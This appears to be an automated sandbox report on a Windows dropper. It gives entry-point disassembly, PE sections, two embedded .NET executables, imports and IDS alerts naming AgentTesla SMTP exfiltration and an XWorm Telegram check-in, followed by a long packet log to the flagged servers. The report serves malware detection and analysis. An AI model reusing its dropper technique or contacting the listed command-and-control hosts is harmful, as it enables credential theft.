mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [00402064h]
pop ecx
or dword ptr [00403040h], FFFFFFFFh
or dword ptr [00403044h], FFFFFFFFh
call dword ptr [00402060h]
mov ecx, dword ptr [0040303Ch]
mov dword ptr [eax], ecx
call dword ptr [0040205Ch]
mov ecx, dword ptr [00403038h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00402058h]
mov eax, dword ptr [eax]
mov dword ptr [00403048h], eax
call 00007FB600F1BD15h
cmp dword ptr [00403028h], ebx
jne 00007FB600F1BC0Eh
push 0040130Ch
call dword ptr [00402054h]
pop ecx
call 00007FB600F1BCE7h
push 0040300Ch
push 00403008h
call 00007FB600F1BCD2h
mov eax, dword ptr [00403034h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00403030h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0040204Ch]
push 00403004h
push 00403000h
call 00007FB600F1BC9Fh

Rich Headers

Programming Language:

[C++] VS98 (6.0) build 8168
[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x208c	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x4da08	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x80	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31c	0x1000	4379eb4853c8b1bb4513db50d6997472	False	0.1533203125	data	1.6095484668607238	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2000	0x336	0x1000	2f1aabb6617ff8136ed129a4721a87c8	False	0.117919921875	data	1.3419768456025012	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3000	0x4c	0x1000	9a1067c760bc211bd6646c8feedced16	False	0.013671875	data	0.0503620825472891	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4000	0x4da08	0x4e000	6d0726a2060588cb9ecd9049b606796b	False	0.41466033153044873	data	5.38872769405723	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_RCDATA	0x40d0	0x3aa05	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows			0.35672731361370574
RT_RCDATA	0x3ead8	0x12c05	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows			0.606536032810364
RT_VERSION	0x516e0	0x328	data	Chinese	China	0.4443069306930693

Imports

DLL	Import
KERNEL32.dll	ExitProcess, FreeResource, CloseHandle, WriteFile, CreateFileA, MoveFileExA, GetTempFileNameA, GetTempPathA, LockResource, LoadResource, SizeofResource, FindResourceA, GetModuleHandleA, GetStartupInfoA
SHELL32.dll	ShellExecuteA
MSVCRT.dll	sprintf, _exit, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _except_handler3, _controlfp, _XcptFilter

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-25T15:36:14.278202+0100	2030171	ET MALWARE AgentTesla Exfil Via SMTP	1	192.168.2.5	49705	162.254.34.31	587	TCP
2024-11-25T15:36:14.278202+0100	2840032	ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	1	192.168.2.5	49705	162.254.34.31	587	TCP
2024-11-25T15:36:25.030421+0100	2853685	ETPRO MALWARE Win32/XWorm Checkin via Telegram	1	192.168.2.5	49706	149.154.167.220	443	TCP
2024-11-25T15:36:25.737135+0100	2855245	ETPRO MALWARE Agent Tesla Exfil via SMTP	1	192.168.2.5	49705	162.254.34.31	587	TCP
2024-11-25T15:36:25.737135+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.5	49705	162.254.34.31	587	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 15:36:19.151210070 CET	49704	443	192.168.2.5	104.26.13.205
Nov 25, 2024 15:36:19.151271105 CET	443	49704	104.26.13.205	192.168.2.5
Nov 25, 2024 15:36:19.151432037 CET	49704	443	192.168.2.5	104.26.13.205
Nov 25, 2024 15:36:19.158540010 CET	49704	443	192.168.2.5	104.26.13.205
Nov 25, 2024 15:36:19.158576965 CET	443	49704	104.26.13.205	192.168.2.5
Nov 25, 2024 15:36:20.489238024 CET	443	49704	104.26.13.205	192.168.2.5
Nov 25, 2024 15:36:20.493083000 CET	49704	443	192.168.2.5	104.26.13.205
Nov 25, 2024 15:36:20.545299053 CET	49704	443	192.168.2.5	104.26.13.205
Nov 25, 2024 15:36:20.545312881 CET	443	49704	104.26.13.205	192.168.2.5
Nov 25, 2024 15:36:20.545635939 CET	443	49704	104.26.13.205	192.168.2.5
Nov 25, 2024 15:36:20.590617895 CET	49704	443	192.168.2.5	104.26.13.205
Nov 25, 2024 15:36:20.758320093 CET	49704	443	192.168.2.5	104.26.13.205
Nov 25, 2024 15:36:20.803339958 CET	443	49704	104.26.13.205	192.168.2.5
Nov 25, 2024 15:36:21.120558977 CET	443	49704	104.26.13.205	192.168.2.5
Nov 25, 2024 15:36:21.120635986 CET	443	49704	104.26.13.205	192.168.2.5
Nov 25, 2024 15:36:21.120723009 CET	49704	443	192.168.2.5	104.26.13.205
Nov 25, 2024 15:36:21.131345987 CET	49704	443	192.168.2.5	104.26.13.205
Nov 25, 2024 15:36:21.749145985 CET	49705	587	192.168.2.5	162.254.34.31
Nov 25, 2024 15:36:22.034368038 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:22.036299944 CET	49705	587	192.168.2.5	162.254.34.31
Nov 25, 2024 15:36:22.827523947 CET	49706	443	192.168.2.5	149.154.167.220
Nov 25, 2024 15:36:22.827562094 CET	443	49706	149.154.167.220	192.168.2.5
Nov 25, 2024 15:36:22.827639103 CET	49706	443	192.168.2.5	149.154.167.220
Nov 25, 2024 15:36:22.844223976 CET	49706	443	192.168.2.5	149.154.167.220
Nov 25, 2024 15:36:22.844257116 CET	443	49706	149.154.167.220	192.168.2.5
Nov 25, 2024 15:36:23.238554955 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:23.273309946 CET	49705	587	192.168.2.5	162.254.34.31
Nov 25, 2024 15:36:23.435730934 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:23.694010019 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:23.694900036 CET	49705	587	192.168.2.5	162.254.34.31
Nov 25, 2024 15:36:23.875370026 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:24.136125088 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:24.137239933 CET	49705	587	192.168.2.5	162.254.34.31
Nov 25, 2024 15:36:24.279877901 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:24.444256067 CET	443	49706	149.154.167.220	192.168.2.5
Nov 25, 2024 15:36:24.444350004 CET	49706	443	192.168.2.5	149.154.167.220
Nov 25, 2024 15:36:24.449929953 CET	49706	443	192.168.2.5	149.154.167.220
Nov 25, 2024 15:36:24.449937105 CET	443	49706	149.154.167.220	192.168.2.5
Nov 25, 2024 15:36:24.450269938 CET	443	49706	149.154.167.220	192.168.2.5
Nov 25, 2024 15:36:24.496922016 CET	49706	443	192.168.2.5	149.154.167.220
Nov 25, 2024 15:36:24.511181116 CET	49706	443	192.168.2.5	149.154.167.220
Nov 25, 2024 15:36:24.550875902 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:24.551141977 CET	49705	587	192.168.2.5	162.254.34.31
Nov 25, 2024 15:36:24.551332951 CET	443	49706	149.154.167.220	192.168.2.5
Nov 25, 2024 15:36:24.683243036 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:24.947067022 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:24.947577953 CET	49705	587	192.168.2.5	162.254.34.31
Nov 25, 2024 15:36:25.030436039 CET	443	49706	149.154.167.220	192.168.2.5
Nov 25, 2024 15:36:25.030504942 CET	443	49706	149.154.167.220	192.168.2.5
Nov 25, 2024 15:36:25.030584097 CET	49706	443	192.168.2.5	149.154.167.220
Nov 25, 2024 15:36:25.043129921 CET	49706	443	192.168.2.5	149.154.167.220
Nov 25, 2024 15:36:25.079375982 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:25.342144012 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:25.342322111 CET	49705	587	192.168.2.5	162.254.34.31
Nov 25, 2024 15:36:25.475276947 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:25.736237049 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:25.737077951 CET	49705	587	192.168.2.5	162.254.34.31
Nov 25, 2024 15:36:25.737134933 CET	49705	587	192.168.2.5	162.254.34.31
Nov 25, 2024 15:36:25.737174034 CET	49705	587	192.168.2.5	162.254.34.31
Nov 25, 2024 15:36:25.737209082 CET	49705	587	192.168.2.5	162.254.34.31
Nov 25, 2024 15:36:25.885725975 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:25.885746956 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:25.885756016 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:25.885771036 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:26.256926060 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:36:26.309386015 CET	49705	587	192.168.2.5	162.254.34.31
Nov 25, 2024 15:36:29.351111889 CET	49707	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:36:29.507122040 CET	1717	49707	89.40.31.232	192.168.2.5
Nov 25, 2024 15:36:29.507253885 CET	49707	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:36:29.598382950 CET	49707	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:36:29.750399113 CET	1717	49707	89.40.31.232	192.168.2.5
Nov 25, 2024 15:36:40.269285917 CET	49707	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:36:40.398169994 CET	1717	49707	89.40.31.232	192.168.2.5
Nov 25, 2024 15:36:50.904160023 CET	49707	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:36:51.066288948 CET	1717	49707	89.40.31.232	192.168.2.5
Nov 25, 2024 15:36:51.493657112 CET	1717	49707	89.40.31.232	192.168.2.5
Nov 25, 2024 15:36:51.493819952 CET	49707	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:36:53.887659073 CET	49707	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:36:53.889051914 CET	49753	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:36:54.015647888 CET	1717	49707	89.40.31.232	192.168.2.5
Nov 25, 2024 15:36:54.018667936 CET	1717	49753	89.40.31.232	192.168.2.5
Nov 25, 2024 15:36:54.018773079 CET	49753	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:36:54.036510944 CET	49753	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:36:54.170738935 CET	1717	49753	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:04.153536081 CET	49753	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:04.289515972 CET	1717	49753	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:14.282002926 CET	49753	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:14.409111977 CET	1717	49753	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:15.947592020 CET	1717	49753	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:15.947707891 CET	49753	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:17.981745958 CET	49753	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:17.983418941 CET	49806	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:18.109812021 CET	1717	49753	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:18.120250940 CET	1717	49806	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:18.122641087 CET	49806	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:18.144352913 CET	49806	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:18.272723913 CET	1717	49806	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:30.356631994 CET	49806	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:30.482741117 CET	1717	49806	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:31.575370073 CET	49806	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:31.700321913 CET	1717	49806	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:36.466365099 CET	49806	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:36.586472034 CET	1717	49806	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:36.586534977 CET	49806	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:36.706866026 CET	1717	49806	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:37.434652090 CET	49806	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:37.554749012 CET	1717	49806	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:40.082515955 CET	1717	49806	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:40.082655907 CET	49806	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:41.591299057 CET	49806	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:41.592200041 CET	49856	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:41.716840982 CET	1717	49806	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:41.716857910 CET	1717	49856	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:41.716970921 CET	49856	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:41.738238096 CET	49856	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:41.860450029 CET	1717	49856	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:46.169111013 CET	49856	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:46.289196014 CET	1717	49856	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:46.825613976 CET	49856	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:46.948570013 CET	1717	49856	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:46.948633909 CET	49856	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:47.068926096 CET	1717	49856	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:47.068989992 CET	49856	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:47.189153910 CET	1717	49856	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:51.263117075 CET	49856	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:51.389348984 CET	1717	49856	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:55.219010115 CET	49856	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:55.469080925 CET	1717	49856	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:57.484554052 CET	49856	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:57.604497910 CET	1717	49856	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:58.278601885 CET	49856	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:58.399355888 CET	1717	49856	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:58.399403095 CET	49856	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:58.519670963 CET	1717	49856	89.40.31.232	192.168.2.5
Nov 25, 2024 15:37:58.700515032 CET	49856	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:37:58.913577080 CET	1717	49856	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:01.781259060 CET	49705	587	192.168.2.5	162.254.34.31
Nov 25, 2024 15:38:01.922498941 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:38:02.163774014 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:38:02.163791895 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:38:02.163867950 CET	49705	587	192.168.2.5	162.254.34.31
Nov 25, 2024 15:38:02.163976908 CET	49705	587	192.168.2.5	162.254.34.31
Nov 25, 2024 15:38:02.284667969 CET	587	49705	162.254.34.31	192.168.2.5
Nov 25, 2024 15:38:03.652617931 CET	1717	49856	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:03.652687073 CET	49856	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:08.481930017 CET	49856	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:08.484034061 CET	49913	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:08.602613926 CET	1717	49856	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:08.604975939 CET	1717	49913	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:08.605068922 CET	49913	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:08.634867907 CET	49913	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:08.758608103 CET	1717	49913	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:08.758671045 CET	49913	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:08.885420084 CET	1717	49913	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:08.885499954 CET	49913	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:09.009804010 CET	1717	49913	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:09.009884119 CET	49913	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:09.129853964 CET	1717	49913	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:10.731682062 CET	49913	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:10.851682901 CET	1717	49913	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:14.216036081 CET	49913	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:14.335956097 CET	1717	49913	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:19.326797962 CET	49913	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:19.450186968 CET	1717	49913	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:19.469283104 CET	49913	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:19.590806007 CET	1717	49913	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:28.419130087 CET	49913	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:28.539211988 CET	1717	49913	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:30.231813908 CET	49913	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:30.352139950 CET	1717	49913	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:30.352214098 CET	49913	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:30.474231005 CET	1717	49913	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:30.513076067 CET	1717	49913	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:30.513145924 CET	49913	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:30.514244080 CET	49913	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:30.515546083 CET	49961	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:30.634522915 CET	1717	49913	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:30.662224054 CET	1717	49961	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:30.662312031 CET	49961	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:30.687355995 CET	49961	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:30.808187962 CET	1717	49961	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:30.841073990 CET	49961	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:30.961476088 CET	1717	49961	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:30.961545944 CET	49961	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:31.083446980 CET	1717	49961	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:40.435451984 CET	49961	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:40.555836916 CET	1717	49961	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:41.669017076 CET	49961	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:41.789226055 CET	1717	49961	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:46.919327974 CET	49961	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:47.039938927 CET	1717	49961	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:47.091120958 CET	49961	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:47.211934090 CET	1717	49961	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:52.646394014 CET	1717	49961	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:52.646470070 CET	49961	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:57.231628895 CET	49961	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:57.234869957 CET	49985	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:57.353754997 CET	1717	49961	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:57.355071068 CET	1717	49985	89.40.31.232	192.168.2.5
Nov 25, 2024 15:38:57.355417967 CET	49985	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:57.372751951 CET	49985	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:38:57.492952108 CET	1717	49985	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:01.028656006 CET	49985	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:01.154001951 CET	1717	49985	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:01.843379021 CET	49985	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:02.140701056 CET	1717	49985	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:02.544101000 CET	49985	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:02.667670012 CET	1717	49985	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:02.667737007 CET	49985	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:02.788516998 CET	1717	49985	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:02.788563013 CET	49985	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:02.911818027 CET	1717	49985	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:05.044255972 CET	49985	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:05.188520908 CET	1717	49985	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:06.355285883 CET	49985	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:06.475358009 CET	1717	49985	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:11.013063908 CET	49985	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:11.154827118 CET	1717	49985	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:12.700413942 CET	49985	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:12.820470095 CET	1717	49985	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:12.981554031 CET	49985	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:13.102833986 CET	1717	49985	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:19.302583933 CET	1717	49985	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:19.302648067 CET	49985	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:23.262799978 CET	49985	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:23.265784025 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:23.387221098 CET	1717	49985	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:23.390176058 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:23.393450975 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:23.410497904 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:23.537347078 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:25.575287104 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:25.751666069 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:38.309710979 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:38.429846048 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:39.309736013 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:39.430098057 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:39.431746006 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:39.551879883 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:39.795427084 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:39.920881033 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:42.575504065 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:42.697204113 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:44.638061047 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:44.758213997 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:44.758265972 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:44.878259897 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:44.888190031 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:45.008212090 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:45.008285999 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:45.128770113 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:45.128818989 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:45.249113083 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:45.249172926 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:45.365629911 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:45.365699053 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:45.365775108 CET	49986	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:45.367821932 CET	49987	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:45.371934891 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:45.492324114 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:45.492346048 CET	1717	49986	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:45.494498968 CET	1717	49987	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:45.494637966 CET	49987	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:45.525410891 CET	49987	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:45.647073984 CET	1717	49987	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:46.653628111 CET	49987	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:46.817116022 CET	1717	49987	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:46.817372084 CET	49987	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:47.046274900 CET	1717	49987	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:47.046350002 CET	49987	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:47.169305086 CET	1717	49987	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:56.295425892 CET	49987	1717	192.168.2.5	89.40.31.232
